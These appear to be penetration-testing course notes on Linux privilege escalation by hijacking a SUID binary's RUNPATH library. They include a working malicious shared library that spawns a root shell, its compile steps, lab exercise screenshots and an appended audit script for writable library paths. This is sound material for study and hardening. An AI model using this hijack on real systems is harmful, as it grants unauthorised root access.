# Enumerating non-standard shared objects
- Binaries under development typically have custom libraries associated with them
- As an example, let's consider the SUID binary below
```bash
ls -la payroll

-rwsr-xr-x 1 root root 16728 Sep 1 22:05 payroll
```
- We can use [ldd](https://manpages.ubuntu.com/manpages/bionic/man1/ldd.1.html) to enumerate shared objects required by a binary or shared object
- `ldd` displays the absolute path to the object and the hexadecimal address where it is loaded into memory for each of a program's dependencies
```bash
ldd payroll

linux-vdso.so.1 => (0x00007ffcb3133000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000)
```
- Above we see the non-standard library named `libshared.so` listed as a dependency for the `payroll` binary
> let's focus our attention here
- As previously mentioned, it is possible to load shared libraries from custom locations
- One such setting is the `RUNPATH` configuration.
  Libraries in the `RUNPATH` folder are given preference over other folders
- `RUNPATH` can be enumerated using [readelf](https://man7.org/linux/man-pages/man1/readelf.1.html)
```bash
readelf -d payroll | grep PATH

0x000000000000001d (RUNPATH) Library runpath: [/development]
```
- As shown above, this config allows the loading of libraries from the `/development` folder, which is writable by all users
- This misconfig can be exploited by placing a malicious library in `/development`, which will take precedence over other folders because entries in this folder are checked first (before other folders present in the config files)

# Creating a malicious library
- Before creating and compiling a malicious library, we need to find the function name called by the `payroll` binary
```bash
ldd payroll

linux-vdso.so.1 (0x00007ffd22bbc000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
/lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000)
```
- As shown above, `payroll` loads `/development/libshared.so`, so we need to copy an existing library here
```bash
cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
```
- Now try running `payroll` and observe the errors
```bash
./payroll

./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery
```
- Based on the above, we see an error stating that `payroll` failed to find the function named `dbquery`
- We can create a malicious file that includes this function as below
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Exported under the symbol name that payroll failed to resolve */
void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);            /* payroll is SUID root, so the real UID becomes 0 as well */
    system("/bin/sh -p"); /* -p keeps the privileged effective UID */
}
```
- Now compile this malicious file into a shared object
```bash
gcc src.c -fPIC -shared -o /development/libshared.so
```
- Finally, execute the `payroll` binary again
- We should see the message `Malicious library loaded` and get a root shell

---
# Exercise
- Same target as previous section
- `ping` test
![[images/Pasted image 20260211195816.png]]
- swap back to `htb-student`
![[images/Pasted image 20260211195902.png]]
- enumerate the `payroll` binary
![[images/Pasted image 20260211200029.png]]
- create malicious file
![[images/Pasted image 20260211200558.png]]
- compile as `/development/libshared.so`
![[images/Pasted image 20260211200809.png]]
- run `payroll` binary
- we have a root shell
![[images/Pasted image 20260211201040.png]]
- enumerate `glibc` version
![[images/Pasted image 20260211201046.png]]
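
On the hardening side, the `readelf` check from the enumeration section can be run over every SUID/SGID binary to find `RUNPATH`/`RPATH` folders that unprivileged users control. The script below is an added example, not part of the original notes; it generalizes the single `payroll` check, the function names and status labels are assumptions, and the sample line is the `readelf` output quoted earlier.

```bash
#!/bin/sh
# Added example (not from the original notes): audit ELF library search paths.

# Print each RUNPATH/RPATH directory found in `readelf -d` output on stdin.
runpath_dirs() {
    sed -nE 's/.*\((RUNPATH|RPATH)\).*\[(.*)\]/\2/p' | tr ':' '\n'
}

# Classify one search-path entry: OK, WRITABLE, MISSING or NONABSOLUTE.
classify_dir() {
    case $1 in
        /*) ;;
        *) echo NONABSOLUTE; return 0 ;;  # empty, relative or $ORIGIN entry: review by hand
    esac
    if [ ! -d "$1" ]; then
        echo MISSING     # folder absent: check who is able to create it
    elif [ -n "$(find "$1" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
        echo WRITABLE    # world-writable, like /development in these notes
    else
        echo OK
    fi
}

# Report "<label> <status> <dir>" for readelf output on stdin; $1 is the label.
audit_readelf_output() {
    runpath_dirs | while IFS= read -r dir; do
        printf '%s\t%s\t%s\n' "$1" "$(classify_dir "$dir")" "$dir"
    done
}

# Scan SUID/SGID files under the given roots (requires readelf from binutils).
audit_suid() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r bin; do
        readelf -d "$bin" 2>/dev/null | audit_readelf_output "$bin"
    done
}

# Constructed sample: the readelf line shown earlier for the payroll binary.
SAMPLE=' 0x000000000000001d (RUNPATH)            Library runpath: [/development]'
printf '%s\n' "$SAMPLE" | audit_readelf_output payroll
```

Call `audit_suid /usr /opt` (or any other roots) on a host with `readelf` installed; every line not marked `OK` points at a search folder whose ownership and permissions need fixing, or a `RUNPATH` that should be removed at build time.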